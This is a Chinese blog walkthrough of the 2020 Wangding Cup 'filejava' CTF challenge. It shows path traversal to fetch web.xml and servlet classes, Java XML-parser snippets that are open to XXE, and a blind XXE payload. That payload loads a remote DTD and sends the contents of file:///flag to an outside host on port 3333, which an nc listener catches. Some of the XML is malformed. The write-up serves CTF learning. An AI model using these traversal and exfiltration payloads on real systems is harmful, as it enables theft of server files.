网鼎杯2020青龙组——filejava通关思路

于 2022-12-28 19:42:19 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: 靶场练习 文章标签: servlet 前端 java 安全威胁分析 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61506558/article/details/128466022
版权

目录

1、启动靶场,访问页面

2、BP抓包

(三)代码审计

1.XMLReader

 2.SAXBuilder

3.SAXReader

4.SAXParserFactory

5.Digester

6.DocumentBuilderFactory

漏洞利用

0x01 判断是否带外执行

0x02 尝试读取内容

1、启动靶场,访问页面

 

图 1-1 前端显示页面

2、BP抓包

        我们先尝试随便上传一个文件,发现它会返回一个文件的下载地址,即下载漏洞

图 1-2 返回的下载地址

 

先下载配置性文件web.xml

../../../WEB-INF/web-xml

通过配置文件,来下载class文件

../../../../WEB-INF/classes/cn/abc/servlet/DownloadServlet.class
../../../../WEB-INF/classes/cn/abc/servlet/ListFileServlet.class
../../../../WEB-INF/classes/cn/abc/servlet/UploadServlet.class

(三)代码审计

图 3-1 导入poi接口

 查看里面的代码也有一定的提示:

图 3-2 err处有提示

 

熟悉java代码审计的师傅,应该很快反应过来了xxe漏洞主要看加载包,函数名。像如下关键接口:

1XMLReader

        XMLReader 接口是一种通过回调读取 XML 文档的接口,其存在于公共区域中。XMLReader 接口是 XML 解析器实现 SAX2 驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。当XMLReader 使用默认的解析方法并且未对 XML 进行过滤时,会出现 XXE 漏洞。 

try { 
     XMLReader xmlReader = XMLReaderFactory.createXMLReader();
         xmlReader.parse(new InputSource(new StringReader(body))); 
        } catch (Exception e) { 
                 return EXCEPT; 
}

 2SAXBuilder

        SAXBuilder 是一个 JDOM 解析器,其能够将路径中的 XML 文件解析为 Document 对象。SAXBuilder 使用第三方 SAX 解析器来处理解析任务,并使用 SAXHandler 的实例侦听 SAX 事件。当 SAXBuilder 使用默认的解析方法并且未对 XML 进行过滤时,会出现XXE 漏洞。 
 try { 
         String body = WebUtils.getRequestBody(request); 
             logger.info(body); 
         SAXBuilder builder = new SAXBuilder(); 
         // org.jdom2.Document document 
             builder.build(new InputSource(new StringReader(body))); // cause xxe 
                 return "SAXBuilder xxe vuln code"; 
         } catch (Exception e) { 
             logger.error(e.toString()); 
             return EXCEPT; 
 }

3SAXReader

        DOM4J 是 dom4j.org 出品的一个开源 XML 解析包,使用起来非常简单,只要了解基本的 XML-DOM 模型,就能使用。 DOM4J / XML 文档主要依赖于 org.dom4j.io 包,它有DOMReader SAXReader 两种方式。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。同样的,在使用默认解析方法并且未对 XML 进行过滤时,其也会出现 XXE 漏洞。 
try { 
         String body = WebUtils.getRequestBody(request); 
         logger.info(body); 
         SAXReader reader = new SAXReader(); 
         // org.dom4j.Document document 
             reader.read(new InputSource(new StringReader(body))); // cause xxe 
     } catch (Exception e) { 
             logger.error(e.toString()); 
             return EXCEPT; 
 }

4SAXParserFactory

        SAXParserFactory 使应用程序能够配置和获取基于 SAX 的解析器以解析 XML 文档。其受保护的构造方法,可以强制使用 newInstance() 。跟上面介绍的一样,在使用默认解析方法且未对 XML 进行过滤时,其也会出现 XXE 漏洞。 
try { 
         String body = WebUtils.getRequestBody(request); 
             logger.info(body); 
         SAXParserFactory spf = SAXParserFactory.newInstance(); 
         SAXParser parser = spf.newSAXParser(); 
             parser.parse(new InputSource(new StringReader(body)), new DefaultHandler()); // parse xml
             return "SAXParser xxe vuln code"; 
     } catch (Exception e) { 
             logger.error(e.toString()); 
             return EXCEPT; 
 }

5Digester

        Digester 类用来将 XML 映射成 Java 类,以简化 XML 的处理。它是 Apache Commons库中的一个 jar 包: common-digester 包。一样的在默认配置下会出现 XXE 漏洞。其触发的 XXE 漏洞是没有回显的,我们一般需通过 Blind XXE 的方法来利用: 
try { 
         String body = WebUtils.getRequestBody(request); 
             logger.info(body); 
         Digester digester = new Digester(); 
             digester.parse(new StringReader(body)); // parse xml 
     } catch (Exception e) { 
             logger.error(e.toString()); 
             return EXCEPT; 
 }

6DocumentBuilderFactory

        javax.xml.parsers 包中的 DocumentBuilderFactory 用于创建 DOM 模式的解析器对象, DocumentBuilderFactory 是一个抽象工厂类,它不能直接实例化,但该类提供了newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。 
try { 
         String body = WebUtils.getRequestBody(request); 
             logger.info(body); 
         DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); 
         DocumentBuilder db = dbf.newDocumentBuilder(); 
         StringReader sr = new StringReader(body); 
         InputSource is = new InputSource(sr); 
         Document document = db.parse(is); // parse xml 
         // 遍历 xml 节点 name 和 value 
         StringBuffer buf = new StringBuffer(); 
         NodeList rootNodeList = document.getChildNodes(); 
         for (int i = 0; i < rootNodeList.getLength(); i++) { 
                 Node rootNode = rootNodeList.item(i); 
                 NodeList child = rootNode.getChildNodes(); 
             for (int j = 0; j < child.getLength(); j++) { 
                         Node node = child.item(j); 
                    buf.append(node.getNodeName() + ":" + node.getTextContent() + "\n");
                     } 
                 } 
         sr.close(); 
         return buf.toString(); 
             }catch (Exception e) { 
         logger.error(e.toString()); 
         return EXCEPT; 
 }

漏洞利用

0x01 判断是否带外执行

图 3-1 利用代码

 

在dnslog平台申请一个域名,点击上传会有数据外带,说明该程序存在漏洞,我们接下来就是要判断是有回显还是没有回显。

0x02 尝试读取内容

图 3-2 尝试读取敏感文件

 

最终判断没有回显,尝试进行反弹shell

1、远程DTD

<DOCTYPE convert[
<!ENTITY %remote SYSTEM "http://www.jinyouxin.com/xxx.dtd">
%remote;%int;%send
]>
<root>&send</send>

2、进行反弹

<!ENTITY %file SYSTEM "file:///flag">
<!ENTITY %int "<!ENTITY &#37;send SYSTEM 'http://www.jinyouxin.com:3333/%file;'>">

3、进行监听

nc -lvvp 3333
图 3-3 数据成功回显

 

@Camelus
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[网鼎杯 2020 青龙 wp ]filejava
mutou990的博客
08-13 668
知识点 web.xml文件泄露 blind xxe 用到的工具: burpsuit或者hackbar都可以 审题 1打开题目如下 2随便上传一个文件,然后点击下载,抓包 看到有filename,猜测可能存在目录穿越以及任意文件下载 3尝试通过报错来获取网站的绝对路径,设置URL参数filename=../ 4爆出了绝对路径,路径里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取,修改filename参数如下(…/数量随意写几个): filename=../../..
[网鼎杯 2020 青龙]filejava
SopRomeo的博客
01-15 719
可以发现他的form表单传入的路径是/UploadServlet 明显就是一个Java类 经过测试尝试目录穿越 报错500 回显了一段前端,我们用脚本处理下 处理后爆出绝对路径 只要稍微学过一点java web的人都知道web.xml是java的配置文件 一般都在WEB-INF目录下 ../../../web.xml 成功读取到配置文件。以及各个类的路径 只要你搭过Tomcat服务器就知道这些类都在WEB-INF/classes目录下 把这些类全部下下来 ../../../classes/cn/.
[网鼎杯 2020 青龙] filejava
charai的博客
05-08 165
进去发现就是一个单纯的文件上传接口,试试功能,发现上传后的文件名会给出,还有一个下载连接,点开下载链接发现是这种格式的 http://7b576de9-dd31-4f71-b86d-0a8d5b6ff15f.node4.buuoj.cn:81/DownloadServlet?filename=e5ac31d0-6273-46bb-9863-d5f6d9105523_pwdTop500.txt 可以看见就是对于传入的参数进行下载,这里试试任意文件下载,了解javaweb的目录是 webapps/WE
2020网鼎杯青龙)--WEB--FileJava(XXE)
a965527596的博客
05-17 2051
FileJava 1.打开题目,只有上传和下载的功能,可以上传任意文件和下载文件,但是不能访问,所以不能用一句话连接,在下载文件功能发现可以下载任意文件,于是将WEB-INF/web.xml页面下载下来,发现有上传和下载的配置文件,由2个类成,将这2个类下载下来。 <?xml version="1.0" encoding="UTF-8"?> -<web-app version="4.0" xsi:schemaLocation="http://xmlns.jcp.org/xml/n
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
2020网鼎杯青龙-filejava
box
08-25 280
网鼎杯 2020 青龙filejava 0x00 访问连接发现是个文件上传表单 尝试上传一个文件 发现上传之后可以下载 发现这个 url格式和常见的文件下载类似,可能存在下载漏洞。 尝试目录穿越下载 WEB-INF/web.xml文件,发现穿越四级目录即可 0x02 下载关键class文件 在web.xml配置文件中发现几个class文件 cn.abc.servlet.DownloadServlet 在网站目录对应 classes/cn.abc/servlet/DownloadServlet.cl
【学习笔记13】buu [2020网鼎杯 web] filejava
weixin_43553654的博客
05-13 418
首先打开网站后 就看到了一个明显的上传位置,任意传一个文件,显示上传成功,并且可以下载,用bp抓一下下载的流量包,显示 可以看到可以读取下载文件的内容,那我们试试能不能读取其他文件,如/etc/passwd,可以读取,接下来就尝试读取配置文件WEB-INF/web.xml 这里因为不知道配置文件的具体位置就用../来代替具体多少慢慢试,可以看到再其中显示的各个文件,以...
Java安全-Java In CTF([网鼎杯 2020 青龙]filejava、[网鼎杯 2020 朱雀]Think Java
Love&Share
05-04 2154
文章目录[网鼎杯 2020 青龙]filejava[网鼎杯 2020 朱雀]Think Java [网鼎杯 2020 青龙]filejava 存在一个 UploadServlet 通过修改上传文件名,构造报错输出 web 目录 正常上传文件 /DownloadServlet?filename=ac6b647b-b31a-4ee7-8b86-9bbdba110a71_1.jpg 尝试任意文件读取,对于 Java 项目来说可以尝试读取 /WEB-INF/web.xml 配置文件 正常来说 web..
[CTF]网鼎杯2020-青龙-Web-FileJava-WriteUp
胖胖的ALEX
05-14 4386
一、赛题截图 二、做题思路 (1)查看源码,唯一有点用信息:./UploadServlet. (2)虽然题目名称和查看源码./UploadServlet都告诉这是一个JAVA程序,但建议还是访问/robots.txt,碰碰运气。 (3)随便上传一个dog.png图片,用Burpsuite抓包,发现新的URL地址:/DownloadServlet?filename=a6c672c9-a74c-4701-abfc-97d68e3c681d_dog.png (4)Burpsuite拦截下载文件请求URL,
[网鼎杯 2020 青龙]singal
Todog的博客
07-30 362
[网鼎杯 2020 青龙]singal
java神器青龙_[网鼎杯 2020 青龙]filejava
weixin_39887386的博客
03-02 123
知识点web.xml文件泄露blind xxe随便上传一个文件,然后点击下载,抓包看到有filename,猜测可能存在目录穿越以及任意文件下载尝试filename=../看到有一个路径,里面有WEB-INF,题目提示与java有关,那应该是web.xml文件泄露,尝试读取DownloadServlet?filename=../../../../../../../../../usr/local/to...
2020年第二届“网鼎杯”网络安全大赛 青龙Web AreUSerialz
热门推荐
艺博东的博客
05-10 1万+
2020年第二届“网鼎杯”网络安全大赛 青龙Web AreUSerialz http://94b1c2d4231f4b4bb92162d5e89dec8f5817750c48224380.cloudgame2.ichunqiu.com/ 进入网址 直接在URL后面输入: ?str=O:11:“FileHandler”:3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:62:“php://filter/convert.base64-encode/resour
java对接青龙系统物流业务
最新发布
12-23
青龙系统是一个专业的物流管理平台,而Java是一种广泛应用于企业级应用开发的编程语言。在对接青龙系统物流业务时,可以利用Java的强大功能和灵活性来实现各种业务需求。 首先,可以使用Java编写程序来与青龙系统进行数据交互,实现物流信息的查询、更新和管理。通过调用青龙系统提供的API接口,可以实现与青龙系统的数据通信,包括获取运单信息、订单状态更新、货物追踪等功能。 其次,利用Java的多线程和异步处理能力,可以实现对接青龙系统的并发请求处理和数据同步,确保业务逻辑的高效和稳定运行。例如,可以编写多线程程序来同时处理多个物流订单的数据更新,并利用异步处理机制来提高数据同步的效率。 另外,可以利用Java的网络编程能力,实现与青龙系统的实时通讯和数据传输。通过建立可靠的网络连接,可以实现物流信息的实时监控和及时处理,提升物流业务的运营效率和客户服务水平。 综上所述,Java作为一种强大的编程语言,可以为对接青龙系统物流业务提供多种技术方案和编程实现。通过充分利用Java的特性和功能,可以实现高效、稳定和灵活的物流业务对接,为企业物流管理带来更多的技术优势和业务价值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

@Camelus

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值